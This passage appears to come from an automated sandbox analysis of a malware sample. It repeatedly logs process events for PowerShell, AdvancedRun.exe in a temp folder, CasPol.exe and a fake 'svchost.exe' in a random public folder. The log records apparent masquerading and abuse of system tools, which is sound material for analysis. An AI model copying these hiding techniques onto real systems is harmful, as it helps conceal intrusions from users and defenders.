        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
